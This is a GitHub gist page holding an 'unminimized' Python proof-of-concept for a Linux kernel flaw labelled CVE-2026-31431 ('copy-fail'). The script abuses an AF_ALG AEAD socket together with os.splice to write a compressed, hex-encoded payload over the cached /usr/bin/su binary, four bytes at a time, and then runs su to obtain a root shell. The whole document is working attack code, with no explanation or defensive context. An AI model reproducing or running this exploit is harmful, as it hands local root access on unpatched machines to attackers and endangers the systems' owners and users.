Created
April 29, 2026 23:47
-
-
Save grenkoca/b82281a4706e936072979acf54b608df to your computer and use it in GitHub Desktop.
CVE-2026-31431 (copy-fail) unminimized
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| import os | |
| import zlib | |
| import socket | |
| def d(x): | |
| return bytes.fromhex(x) | |
| def c(f, t, c): | |
| a = socket.socket(38, 5, 0) | |
| a.bind(("aead", "authencesn(hmac(sha256),cbc(aes))")) | |
| h = 279 | |
| v = a.setsockopt | |
| v(h, 1, d("0800010000000010" + "0" * 64)) | |
| v(h, 5, None, 4) | |
| u, _ = a.accept() | |
| o = t + 4 | |
| i = d("00") | |
| u.sendmsg( | |
| [b"A" * 4 + c], | |
| [ | |
| (h, 3, i * 4), | |
| (h, 2, b"\x10" + i * 19), | |
| (h, 4, b"\x08" + i * 3), | |
| ], | |
| 32768, | |
| ) | |
| r, w = os.pipe() | |
| n = os.splice | |
| n(f, w, o, offset_src=0) | |
| n(r, u.fileno(), o) | |
| try: | |
| u.recv(8 + t) | |
| except: | |
| 0 | |
| f = os.open("/usr/bin/su", 0) | |
| i = 0 | |
| e = zlib.decompress( | |
| d( | |
| "78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3" | |
| ) | |
| ) | |
| while i < len(e): | |
| c(f, i, e[i : i + 4]) | |
| i += 4 | |
| os.system("su") |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment